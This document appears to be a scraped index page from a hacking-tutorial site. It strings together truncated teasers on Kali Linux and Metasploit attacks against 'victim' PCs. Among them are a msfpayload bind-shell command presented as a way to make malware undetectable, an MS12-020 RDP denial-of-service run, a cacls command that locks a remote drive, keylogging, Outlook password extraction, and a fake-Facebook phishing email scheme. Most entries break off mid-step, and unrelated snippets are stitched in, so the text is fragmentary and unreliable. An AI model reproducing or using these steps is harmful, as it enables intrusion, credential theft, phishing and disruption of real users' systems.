Man In The Middle Attack With Kali Linux

It’s one of the simplest but also most essential steps to “Conquering” a network. Once a hacker has performed a “Man In The Middle” attack (MITM) on a local network, he is able to perform a number of other “Side-kick” attacks. This includes, cutting a victim’s internet connection; intercepting Emails, logins, and chat messages; and many others.

And only one tools is needed for this attack:

An install or Live boot of Kali Linux, a well-known OS containing a collection of hundreds of penetration testing tools.

If you have that, then proceed to the tutorial below, and we’ll demonstrate how to perform this powerful attack.

Denial-of-service Attack – DOS using hping3 with spoofed IP in Linux

In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.

Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.
As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.
Denial-of-service threats are also common in business, and are sometimes responsible for website attacks.

Hacking Android Smartphone Tutorial

1.      Open terminal (CTRL + ALT + T) view tutorial how to create Linux keyboard shortcut.

Advanced Networking Commands

In one of our previous tutorials, you've learned how to use basic commands in Command Prompt. Now it's time to take things to the next level and show how to use some of the more advanced commands. The first set of advanced commands contains useful network commands which facilitate the following: viewing information about your network devices and connections (assigned IP Address, the MAC of the network card), checking the availability of a certain host and displaying a wealth of networking and ports information

.

Retrieving Information about Your Network Connection

To obtain detailed information about your network connection, use the ipconfig command. Type ipconfig in Command Prompt and press Enter. As you can see below, a list with the network devices existing on your system and their IP addresses is displayed. You get also details such the default gateway, subnet mask or the state of the network adapter.

Hack Security Features in Remote PC

First Hack the Victim PC Using Metasploit 

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Change ALL Files Extension in Remote PC (Confuse File Extensions Attack)

First Hack the Victim PC Using Metasploit 

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How To Bypass Antivirus Detection Making An Executable FUD

So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Their are lots of approaches, however here we will take a look at how to make an executable FUD using msfencode.

Requirements

• Metasploit ( Kali Linux )

Attention

We are using some harmless test files but don’t infect people with any real viruses. That would be a crime.

Purpose

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won’t spread, but it is detected by antivirus engines. In Kali Linux in a Terminal windows execute these commands:

msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe

ls -l listen.exe

FIX installing & slow updating packages in Kali Linux 100% Working

Open terminal and write

nano /etc/apt/sources.list

And then Replace all text with this

Metasploit Modules Post Windows Gather {Computer Forensics Tutorial}

Now Open Kali Linux terminal type msfconsole

 

Once you got the meterpreter session 

1)      arp_scanner

The "arp_scanner" post module will perform an ARP scan for 

a given range through a compromised host.

Metasploit Windows Post Capture Modules {Computer Forensics Tutorial}

Now Open Kali Linux terminal type msfconsole

Once you got the meterpreter session

keylog_recorder

The "keylog_recorder" post module captures keystrokes on the compromised system. Note that you will want to ensure that you have migrated to an interactive process prior to capturing keystrokes.

How to Gather Microsoft Outlook Saved Password in Remote PC

Windows Gather Microsoft Outlook Saved Password Extraction

This module extracts and decrypts saved Microsoft Outlook (versions 2002-2010) passwords from the Windows Registry for POP3/IMAP/SMTP/HTTP accounts. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password.

Exploit Targets

Microsoft Outlook 2003, XP

Microsoft Outlook 2007

Microsoft Outlook 2010

Now Open Kali Linux terminal type msfconsole

 

Once you got the meterpreter session

Wifi DDoser with Websploit

I’m on VMware  so i can do it  cause no wireless on this computer so I’m run threw  how to any ways.

Step 1  load up terminal and type
airmon-ng start wlan0
this will turn on mon0
then

{ New Tutorial } How To Stay Anonymous Online

This Tutorial Will cover the fallowing:

- Using Fake Identity
- Using Search Engine anonymously
- Using VPN / Proxy and more...

Fake Identity

Why use fake identity? Well it is a really good way to hide your real identity online for example, if you are creating key loggers it isn't
the best idea to use your everyday E-mail to receive logs.

Firstly, You have to build an idea of who you want to be. Without proof, you can claim to be virtually anyone.
Well it isn't exactly hard you can just make the info up by yourself or you can use online id generators I recommend any of the fallowing:

OpenSSL Heartbeat (Heartbleed) Attack Using Metasploit

This module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable. The module supports several actions, allowing for scanning, dumping of memory contents, and private key recovery.

Now Open Kali Linux terminal type msfconsole

Google Dork to find Phishing Page Password File

The following dork will give you the result of the phishers password .txt file

Forensics of Remote PC (Part 2)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target.

Now type wmic /? Displays help

wmic cpu list full – get Name, Caption, MaxClockSpeed, DeviceID, and etc status

Forensics of Remote PC (Part 1)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

How to Find System Boot Time and Install Original Date

Systeminfo – Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, and product ID, and hardware properties, such as RAM, disk space, and network cards.

Metasploit Basic Command

There are many new user of metasploit (beginner of metasploit) ask use to write a basic introductory article about the basic metasploit command and basic usage of metasploit, however we have shared different advance and mid level metasploit tutorial on backtrack 5 you can learn different commands from these tutorials but here is the list of the best and most common commands that are used in metasploit for different purposes. Later on we will share meterpreter commands as well.

Metasploit is the database of all exploits and a software that contain information about different exploits so here is the basic usage of metasploit, I am using backtrack 5 machine for this tutorial however if you are using other Linux distribution or windows OS than it is fine but the requirement is Metasploit.

How to send Anonymous Mail to anyone & Set up your own server

Everyone Like to send Anonymous Mail to your enemy or friend or teacher. Here is the Hacking tutorial for you to implement that. So i hope This will be best hack for you. What is the Use?
I explained you in my older post how to get ip address. To get the ip address you need to send the mail with link. So You can send mail to your victim with that link such that you are contacting from an organization.
For Eg:
You can say we are from Facbook,we have new feature to enable the feature visit this page. How to do?
 
Step 1:
First of all you need to register in free web hosting service which has PHP feature. So my choice is x10hosting.com & 000webhost.com

Tutorial about google Dorks

Dorks

They are basically as the search criteria in a search engine returns results related to your search. The process can be a bit slow , but the result will be worth after learning about the use .
Basic formula

"inurl : . " domain " / " search ","

means so broken
"inurl " = URL input
"domain" domain = example gob com gov net etc etc
" dork " = what you want espesificamente search esl main element of the rest are complements search accuracy.

How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer.

We need the following tools to create our rootkit

Send Free SMS Unlimited Worldwide & No need to register

Send unlimited free SMS messages online. No need to register, just write your message and send unlimited sms to any country you like for FREE!
No matter where you are, you will always enjoy our FREE SMS text message Service.
Check out the countries available in our list and have fun by sending free SMS to your loved ones for Free!



Steps:-

How to Lock Drive of Remote Windows Victim PC

First Hack the Victim PC Using Metasploit Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target.

Type Cacls (Drive Name) /e /p everyone:n and press Enter.This will lock your “E Drive” 

Solution For Unlock

Now right-click on your E drive –> Properties –> Click on “Security” tab click on C ContinueCheck the check box “Full Control” –> Click on OK.

Parameters

FileName   : Required. Displays DACLs of specified files.

/t   : Changes DACLs of specified files in the current directory and all subdirectories.

/e   : Edits a DACL instead of replacing it.

/c   : Continues to change DACLs, ignoring errors.

/g   User: permission   : Grants access rights to the specified user. The following table lists valid values for permission.

Value	Description
n	None
r	Read
w	Write
c	Change (Write)
f	Full Control

How to Perform Blue Screen Death Attack on Remote Windows 7 PC

This Metasploit module exploits vulnerability in win32k.sys where under specific conditions Track Popup Menu Ex will pass a NULL pointer to the MN End Menu State procedure. This Metasploit module has been tested successfully on Windows 7 SP0 and Windows 7 SP1

Now Open Kali Linux terminal type msfconsole

Now type use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) > show options

msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.0.105

msf auxiliary(ms12_020_maxchannelids) > show options

msf auxiliary(ms12_020_maxchannelids) > exploit

Firewall Detection Tool Wafw00f

Introduction

This is a Web Application Firewall Detection Tool.
The tool was written by – Sandro Gauci And G. Henrique.

It will help you detect the WAF ( Web Application Firewall )  behind the any domain.
Wiffit (Wafw00f ) can test for these Firewalls listed in the image -
If any firewall is detected from the list it will display on-screen

How Wiffit (Wafw00f) detects Web Application Firewall (WAF)
To detect WAF it looks for the following things :

• Cookies
• ServerCloaking
• Response Codes
• Drop Action
• Pre Built-In Rules

How to Open Wiffit On Kali Linux

Applications > Kali Linux > Information Gathering > IDS/IPS Identification > wafw00f

wafw00f is open now , see the below image for more details -

How to use wafw00f

Example 1 :
Usage :

1. root@root :

wafw00f [ target url ]

2. Example :

wafw00f www.***.com

3. This example shows that www.***.com is behind the Web Application Firewall.
4. www.***.com is behind the Imperva WAF.

Example 2 :

• Here google.com is also behind the WAF .
• All these images shows these website are using IDS and it blocks my request all the time .

Example 3 :

• Flipkart is also using WAF (Web Application Firewall)
  

Example 4 :wafw00f -a  http://www.google.com/

Nothing found there either.

Example 5 :wafw00f -l -t http://www.google.com/

Nothing found there either.